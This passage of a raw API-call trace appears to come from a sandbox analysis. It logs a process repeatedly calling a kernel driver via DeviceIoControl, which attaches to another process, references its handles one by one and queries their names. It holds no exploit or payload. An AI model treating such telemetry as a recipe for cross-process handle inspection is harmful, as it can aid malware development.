0x0 [0186.237] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.238] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80038109c0, HandleInformation=0x0) returned 0x0 [0186.238] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.238] PsReleaseProcessExitSynchronization () returned 0x2 [0186.238] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.238] ObQueryNameString (in: Object=0xfffffa80038109c0, ObjectNameInfo=0xfffffa80031393c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa80031393c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.238] ObfDereferenceObject (Object=0xfffffa80038109c0) returned 0x2 [0186.238] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.238] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.238] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.238] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.238] PsAcquireProcessExitSynchronization () returned 0x0 [0186.238] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.238] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800214fe60, HandleInformation=0x0) returned 0x0 [0186.238] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.238] PsReleaseProcessExitSynchronization () returned 0x2 [0186.238] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.238] ObQueryNameString (in: Object=0xfffffa800214fe60, ObjectNameInfo=0xfffffa800313b7c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313b7c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.238] ObfDereferenceObject (Object=0xfffffa800214fe60) returned 0x3 [0186.239] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.239] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.239] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.239] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.239] PsAcquireProcessExitSynchronization () returned 0x0 [0186.239] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.239] ObReferenceObjectByHandle (in: Handle=0xbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002050b20, HandleInformation=0x0) returned 0x0 [0186.239] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.239] PsReleaseProcessExitSynchronization () returned 0x2 [0186.239] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.239] ObQueryNameString (in: Object=0xfffffa8002050b20, ObjectNameInfo=0xfffffa800317e044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317e044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.239] ObfDereferenceObject (Object=0xfffffa8002050b20) returned 0x1 [0186.239] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.239] NtQueryInformationThread (in: ThreadHandle=0x0, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000008 [0186.239] NtQueryInformationThread (in: ThreadHandle=0x0, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000008 [0186.239] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.240] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.240] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.240] PsAcquireProcessExitSynchronization () returned 0x0 [0186.240] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.240] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002007070, HandleInformation=0x0) returned 0x0 [0186.240] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.240] PsReleaseProcessExitSynchronization () returned 0x2 [0186.240] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.240] ObQueryNameString (in: Object=0xfffffa8002007070, ObjectNameInfo=0xfffffa800314a044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314a044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.240] ObfDereferenceObject (Object=0xfffffa8002007070) returned 0x1 [0186.240] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.240] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.240] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.240] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.240] PsAcquireProcessExitSynchronization () returned 0x0 [0186.240] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.240] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800204bec0, HandleInformation=0x0) returned 0x0 [0186.240] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.241] PsReleaseProcessExitSynchronization () returned 0x2 [0186.241] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.241] ObQueryNameString (in: Object=0xfffffa800204bec0, ObjectNameInfo=0xfffffa8003149044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003149044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.241] ObfDereferenceObject (Object=0xfffffa800204bec0) returned 0x1 [0186.241] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.241] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.241] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0186.241] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.241] PsAcquireProcessExitSynchronization () returned 0x0 [0186.241] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.241] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0186.241] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.241] PsReleaseProcessExitSynchronization () returned 0x2 [0186.241] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.241] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.241] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x26 [0186.241] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.242] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.242] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x4e, lpOverlapped=0x0) returned 1 [0186.242] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.242] PsAcquireProcessExitSynchronization () returned 0x0 [0186.242] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.242] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a0013ca5f0, HandleInformation=0x0) returned 0x0 [0186.242] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.242] PsReleaseProcessExitSynchronization () returned 0x2 [0186.242] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.242] ObQueryNameString (in: Object=0xfffff8a0013ca5f0, ObjectNameInfo=0xfffffa8003147044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003147044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.242] ObfDereferenceObject (Object=0xfffff8a0013ca5f0) returned 0x1 [0186.242] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.242] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.242] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0186.242] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.242] PsAcquireProcessExitSynchronization () returned 0x0 [0186.242] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.242] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80018ccde0, HandleInformation=0x0) returned 0x0 [0186.243] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.243] PsReleaseProcessExitSynchronization () returned 0x2 [0186.243] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.243] ObQueryNameString (in: Object=0xfffffa80018ccde0, ObjectNameInfo=0xfffffa8003143044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003143044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.243] ObfDereferenceObject (Object=0xfffffa80018ccde0) returned 0x17 [0186.243] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.243] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.243] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0186.243] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.243] PsAcquireProcessExitSynchronization () returned 0x0 [0186.243] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.243] ObReferenceObjectByHandle (in: Handle=0xdc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0186.243] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.243] PsReleaseProcessExitSynchronization () returned 0x2 [0186.243] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.243] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003144044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003144044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.243] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x26 [0186.243] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.244] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.244] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.244] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.244] PsAcquireProcessExitSynchronization () returned 0x0 [0186.244] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.244] ObReferenceObjectByHandle (in: Handle=0xe0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800287e5a0, HandleInformation=0x0) returned 0x0 [0186.244] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.244] PsReleaseProcessExitSynchronization () returned 0x2 [0186.244] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.244] ObQueryNameString (in: Object=0xfffffa800287e5a0, ObjectNameInfo=0xfffffa8003145044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003145044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.244] ObfDereferenceObject (Object=0xfffffa800287e5a0) returned 0x1 [0186.244] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.244] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.244] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.244] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.244] PsAcquireProcessExitSynchronization () returned 0x0 [0186.245] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.245] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002811750, HandleInformation=0x0) returned 0x0 [0186.245] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.245] PsReleaseProcessExitSynchronization () returned 0x2 [0186.245] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.245] ObQueryNameString (in: Object=0xfffffa8002811750, ObjectNameInfo=0xfffffa8003146044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003146044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.245] ObfDereferenceObject (Object=0xfffffa8002811750) returned 0x1 [0186.245] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.245] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.245] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.245] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.245] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.245] PsAcquireProcessExitSynchronization () returned 0x0 [0186.245] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.245] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80028e0410, HandleInformation=0x0) returned 0x0 [0186.245] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.245] PsReleaseProcessExitSynchronization () returned 0x2 [0186.245] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.245] ObQueryNameString (in: Object=0xfffffa80028e0410, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.245] ObfDereferenceObject (Object=0xfffffa80028e0410) returned 0x1 [0186.246] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.246] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.246] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.246] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.246] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.246] PsAcquireProcessExitSynchronization () returned 0x0 [0186.246] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.246] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800200b280, HandleInformation=0x0) returned 0x0 [0186.246] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.899] PsReleaseProcessExitSynchronization () returned 0x2 [0186.899] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.899] ObQueryNameString (in: Object=0xfffffa800200b280, ObjectNameInfo=0xfffffa800314c044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314c044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.899] ObfDereferenceObject (Object=0xfffffa800200b280) returned 0x1 [0186.899] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.899] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.899] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.899] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0186.899] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.899] PsAcquireProcessExitSynchronization () returned 0x0 [0186.899] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.900] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800283eb70, HandleInformation=0x0) returned 0x0 [0186.900] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.900] PsReleaseProcessExitSynchronization () returned 0x2 [0186.900] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.900] ObQueryNameString (in: Object=0xfffffa800283eb70, ObjectNameInfo=0xfffffa800311f2c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800311f2c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.900] ObfDereferenceObject (Object=0xfffffa800283eb70) returned 0x2 [0186.900] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.900] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.900] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.900] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.900] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.900] PsAcquireProcessExitSynchronization () returned 0x0 [0186.900] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.901] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80034b4800, HandleInformation=0x0) returned 0x0 [0186.901] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.901] PsReleaseProcessExitSynchronization () returned 0x2 [0186.901] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.901] ObQueryNameString (in: Object=0xfffffa80034b4800, ObjectNameInfo=0xfffffa80031393c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa80031393c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.901] ObfDereferenceObject (Object=0xfffffa80034b4800) returned 0x1 [0186.901] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.901] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.901] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0186.901] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.902] PsAcquireProcessExitSynchronization () returned 0x0 [0186.902] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.902] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, 